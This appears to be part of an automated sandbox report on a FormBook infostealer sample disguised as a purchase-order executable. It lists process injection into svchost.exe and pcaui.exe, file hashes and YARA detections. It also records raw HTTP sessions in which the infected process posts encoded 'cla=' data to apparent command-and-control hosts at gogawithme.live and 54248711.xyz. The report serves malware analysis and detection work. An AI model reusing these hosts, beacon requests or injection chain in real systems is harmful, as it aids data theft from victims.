                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.5 | 50012 | 209.74.77.109 | 80 | 2128 | C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
Timestamp | Bytes transferred | Direction | Data
Nov 22, 2024 07:57:37.855245113 CET | 1650 | OUT | POST /6gtt/ HTTP/1.1
                                                                                                            Host: www.gogawithme.live
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.gogawithme.live
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 1240
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Referer: http://www.gogawithme.live/6gtt/
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Data Raw: 63 6c 61 3d 66 45 6f 55 73 33 78 62 74 43 48 52 4f 37 52 64 6d 39 4f 4a 74 59 69 53 69 78 72 7a 64 2f 66 6f 4c 5a 69 73 58 76 54 75 4a 44 7a 76 32 63 7a 6f 66 6b 71 46 65 2b 65 69 75 53 4a 78 31 2b 5a 34 32 5a 54 5a 55 61 43 69 6c 4c 71 41 46 49 51 6a 2b 75 33 73 57 74 44 58 63 69 33 53 76 64 56 57 45 6b 4c 72 2f 6e 65 37 4b 58 43 64 41 5a 78 4a 68 45 34 49 6c 71 47 4a 30 6d 52 2f 52 42 30 42 66 59 69 42 48 4e 38 76 6a 31 5a 57 68 4d 54 79 72 6a 74 44 66 71 4b 6e 79 31 36 52 75 63 71 74 5a 41 7a 35 31 6d 6c 41 4e 52 57 73 34 66 53 4f 52 77 6b 43 35 56 67 4a 32 48 4f 4d 34 78 48 71 75 35 53 37 49 57 64 61 79 31 63 4f 73 6c 4e 47 52 44 6f 37 64 65 78 36 6a 48 31 72 33 65 68 36 49 36 4d 2b 48 75 2f 66 70 57 62 4e 57 77 45 6a 31 68 46 51 63 68 6c 58 47 2f 79 45 53 30 76 4c 45 37 73 4d 34 6e 67 47 2f 6a 37 41 7a 33 4d 61 65 6e 59 78 71 7a 79 5a 41 6d 51 30 7a 49 4c 4d 44 46 4b 57 6f 6b 47 67 42 77 72 75 45 65 5a 5a 64 2f 56 69 46 37 54 61 41 51 47 72 59 50 65 52 31 53 72 68 53 39 33 79 74 65 34 67 67 6c [TRUNCATED]
                                                                                                            Data Ascii: cla=fEoUs3xbtCHRO7Rdm9OJtYiSixrzd/foLZisXvTuJDzv2czofkqFe+eiuSJx1+Z42ZTZUaCilLqAFIQj+u3sWtDXci3SvdVWEkLr/ne7KXCdAZxJhE4IlqGJ0mR/RB0BfYiBHN8vj1ZWhMTyrjtDfqKny16RucqtZAz51mlANRWs4fSORwkC5VgJ2HOM4xHqu5S7IWday1cOslNGRDo7dex6jH1r3eh6I6M+Hu/fpWbNWwEj1hFQchlXG/yES0vLE7sM4ngG/j7Az3MaenYxqzyZAmQ0zILMDFKWokGgBwruEeZZd/ViF7TaAQGrYPeR1SrhS93yte4ggl0ry8s60ngHQm7KTU2X4RSSGcimiZ8VHwfPZx0uJD9iu0nRhaX686xPiNL/9q42GHrp184LylIgb7cJL30i/cKEk5N9LfvX3uATQPXfQDpgXi5n3/NzYnxvAOVp4Zx+1ZUjDnKOxyN62PCjgL44nSFdSzG+1RbyJCi7hj0NwvmJdxTfbf89CJ2PB8n6XhxJ5z+KwqpzISVE4NfiLo2EXunuwCP/gH62IHACfSPPpZ6pKn2XDVEX5vkpv68N0XlS31UPwMTidmTeTMWwF0rtl+eIlIETAms3rmEduB/VnEt9JbQNZ+uD0XJ4cDEmlgcrftl2q9bxXQkuSx2y53xzQq550zL2mwF9GFAAoXkjeaJNvmUVZF4TI5YNDJSXI8WXB13TsU6nHZB1S89misI/D4ytutIuXiQvEjloviTo0aGXosKC9gsBVoVWkGo30UWHS3e6ge6dVmvINtc3iMdT6MzpxmQUYXCIFwqxDzNsU22mndPbfABLscbY20h/eNydP1JEHhM7/3Vb9H9oPnPISnjVWaA0QN5vix/8B2xQJkb4Sv0l5b0HGIj4Ql53QSEeRWb7iFC6Y0297aHXEZSqMRyJtfhGXx4TNk36z3Xvk3zmxmGjHNNNckMEUNxqzrkiexZ/RdOcBmfH6rUuASN7aGw4N0cAW6JmmtVI [TRUNCATED]
Nov 22, 2024 07:57:38.106501102 CET | 1236 | OUT | Data Raw: 66 45 6f 55 73 33 78 62 74 43 48 52 4f 37 52 64 6d 39 4f 4a 74 59 69 53 69 78 72 7a 64 2f 66 6f 4c 5a 69 73 58 76 54 75 4a 44 7a 76 32 63 7a 6f 66 6b 71 46 65 2b 65 69 75 53 4a 78 31 2b 5a 34 32 5a 54 5a 55 61 43 69 6c 4c 71 41 46 49 51 6a 2b 75
                                                                                                            Data Ascii: fEoUs3xbtCHRO7Rdm9OJtYiSixrzd/foLZisXvTuJDzv2czofkqFe+eiuSJx1+Z42ZTZUaCilLqAFIQj+u3sWtDXci3SvdVWEkLr/ne7KXCdAZxJhE4IlqGJ0mR/RB0BfYiBHN8vj1ZWhMTyrjtDfqKny16RucqtZAz51mlANRWs4fSORwkC5VgJ2HOM4xHqu5S7IWday1cOslNGRDo7dex6jH1r3eh6I6M+Hu/fpWbNWwEj1hF
Nov 22, 2024 07:57:39.107515097 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                            Date: Fri, 22 Nov 2024 06:57:38 GMT
                                                                                                            Server: Apache
                                                                                                            Content-Length: 389
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.5 | 50013 | 209.74.77.109 | 80 | 2128 | C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
Timestamp | Bytes transferred | Direction | Data
Nov 22, 2024 07:57:40.504962921 CET | 353 | OUT | GET /6gtt/?cla=SGA0vAB7ljjiJZBksJb1gqec1i3dMNjZK6uCbLTCC3HP5ur0cn6Abe6/hzp/g4dh4YOAUYGeqr6sPYYs6bnbftG3TST47at8LnD6yWitNli0aOZiiyErkaGZ0ExcXW9KKA==&jbeXk=EHbdQPuX HTTP/1.1
                                                                                                            Host: www.gogawithme.live
                                                                                                            Accept: */*
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Nov 22, 2024 07:57:41.774331093 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                                                            Date: Fri, 22 Nov 2024 06:57:41 GMT
                                                                                                            Server: Apache
                                                                                                            Content-Length: 389
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.5 | 50014 | 161.97.142.144 | 80 | 2128 | C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
Timestamp | Bytes transferred | Direction | Data
Nov 22, 2024 07:57:47.521241903 CET | 604 | OUT | POST /jm2l/ HTTP/1.1
                                                                                                            Host: www.54248711.xyz
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.54248711.xyz
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 204
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Referer: http://www.54248711.xyz/jm2l/
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Data Raw: 63 6c 61 3d 42 30 64 43 6f 4b 74 49 47 71 47 63 74 7a 6f 72 2b 61 37 63 45 31 4b 56 78 75 79 70 33 69 66 33 49 70 7a 78 44 79 51 76 55 44 56 73 56 62 30 41 35 55 6b 30 4a 6f 6c 5a 47 59 61 73 75 2b 64 39 70 51 74 43 31 50 42 76 47 41 56 35 78 78 59 71 69 63 57 39 6a 64 35 49 6f 75 41 57 54 4d 52 30 69 42 78 37 50 56 4a 4e 2b 42 66 44 34 6a 4b 42 65 34 78 46 58 6c 73 47 6d 2f 30 6f 68 32 4e 74 4e 4e 6d 65 2b 48 6c 78 58 67 77 33 54 5a 56 75 67 68 69 78 55 65 6d 74 64 2b 41 4d 35 33 72 64 32 6b 6b 34 39 36 53 59 56 50 76 45 79 78 73 63 41 48 39 4c 5a 34 63 33 57 4f 77 6c 54 55 4b 38 4f 64 53 41 6e 71 67 3d
                                                                                                            Data Ascii: cla=B0dCoKtIGqGctzor+a7cE1KVxuyp3if3IpzxDyQvUDVsVb0A5Uk0JolZGYasu+d9pQtC1PBvGAV5xxYqicW9jd5IouAWTMR0iBx7PVJN+BfD4jKBe4xFXlsGm/0oh2NtNNme+HlxXgw3TZVughixUemtd+AM53rd2kk496SYVPvEyxscAH9LZ4c3WOwlTUK8OdSAnqg=
Nov 22, 2024 07:57:48.796672106 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                            Server: nginx
                                                                                                            Date: Fri, 22 Nov 2024 06:57:48 GMT
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Vary: Accept-Encoding
                                                                                                            ETag: W/"66cce1df-b96"
                                                                                                            Content-Encoding: gzip
                                                                                                            Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                                            Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
Nov 22, 2024 07:57:48.796721935 CET | 370 | IN | Data Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                                                            Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


Session ID | Source IP | Source Port | Destination IP | Destination Port
38 | 192.168.2.5 | 50015 | 161.97.142.144 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 22, 2024 07:57:50.447796106 CET | 624 | OUT | POST /jm2l/ HTTP/1.1
                                                                                                            Host: www.54248711.xyz
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.54248711.xyz
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 224
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Referer: http://www.54248711.xyz/jm2l/
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Data Raw: 63 6c 61 3d 42 30 64 43 6f 4b 74 49 47 71 47 63 69 7a 34 72 38 39 48 63 4d 31 4b 57 30 75 79 70 73 53 66 4e 49 70 50 78 44 33 70 6f 55 32 46 73 57 36 45 41 34 57 41 30 45 49 6c 5a 4d 34 61 74 6a 65 63 51 70 52 51 31 31 4c 42 76 47 41 42 35 78 77 6f 71 69 72 4b 2b 78 64 35 4b 68 4f 41 55 4f 63 52 30 69 42 78 37 50 56 4e 72 2b 46 7a 44 34 53 36 42 63 61 56 47 55 6c 73 5a 68 2f 30 6f 6c 32 4e 54 4e 4e 6d 34 2b 47 34 61 58 6a 49 33 54 59 6c 75 67 30 65 77 66 65 6d 72 54 65 42 4f 39 47 53 30 78 6c 31 31 35 34 71 66 4e 2f 37 79 2b 6e 64 32 61 6c 31 6a 4b 59 77 50 47 64 34 53 43 6b 72 56 55 2b 43 77 35 39 32 37 30 4d 34 56 72 53 52 6c 59 44 48 52 35 52 4f 33 6d 73 73 5a
                                                                                                            Data Ascii: cla=B0dCoKtIGqGciz4r89HcM1KW0uypsSfNIpPxD3poU2FsW6EA4WA0EIlZM4atjecQpRQ11LBvGAB5xwoqirK+xd5KhOAUOcR0iBx7PVNr+FzD4S6BcaVGUlsZh/0ol2NTNNm4+G4aXjI3TYlug0ewfemrTeBO9GS0xl1154qfN/7y+nd2al1jKYwPGd4SCkrVU+Cw59270M4VrSRlYDHR5RO3mssZ
Nov 22, 2024 07:57:51.769519091 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                            Server: nginx
                                                                                                            Date: Fri, 22 Nov 2024 06:57:51 GMT
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Vary: Accept-Encoding
                                                                                                            ETag: W/"66cce1df-b96"
                                                                                                            Content-Encoding: gzip
                                                                                                            Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                                            Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
Nov 22, 2024 07:57:51.769551992 CET | 370 | IN | Data Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                                                            Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L



Target ID: 0
Start time: 01:54:42
Start date: 22/11/2024
Path: C:\Users\user\Desktop\PO #2411071822.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\PO #2411071822.exe"
Imagebase: 0x3e0000
File size: 1'213'440 bytes
MD5 hash: 564780E97B7357CA98FC62DB3DF63809
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 2
Start time: 01:54:44
Start date: 22/11/2024
Path: C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\PO #2411071822.exe"
Imagebase: 0x460000
File size: 46'504 bytes
MD5 hash: 1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2152031771.0000000002ED0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2151673772.0000000002470000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2152486099.0000000003600000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:3
                                                                                                            Start time:01:54:46
                                                                                                            Start date:22/11/2024
                                                                                                            Path:C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe"
                                                                                                            Imagebase:0x170000
                                                                                                            File size:140'800 bytes
                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3891999951.0000000003140000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:high
                                                                                                            Has exited:false

                                                                                                            Target ID:4
                                                                                                            Start time:01:54:48
                                                                                                            Start date:22/11/2024
                                                                                                            Path:C:\Windows\SysWOW64\pcaui.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\SysWOW64\pcaui.exe"
                                                                                                            Imagebase:0xc60000
                                                                                                            File size:135'680 bytes
                                                                                                            MD5 hash:A8F63C86DEF45A7E48E7F7DF158CFAA9
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3892074167.0000000005060000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3891158073.00000000032D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3892013013.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:low
                                                                                                            Has exited:false

                                                                                                            Target ID:6
                                                                                                            Start time:01:55:02
                                                                                                            Start date:22/11/2024
                                                                                                            Path:C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe"
                                                                                                            Imagebase:0x170000
                                                                                                            File size:140'800 bytes
                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3893435430.0000000005420000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:high
                                                                                                            Has exited:false

                                                                                                            Target ID:7
                                                                                                            Start time:01:55:14
                                                                                                            Start date:22/11/2024
                                                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                            Imagebase:0x7ff79f9e0000
                                                                                                            File size:676'768 bytes
                                                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                            Has elevated privileges:false
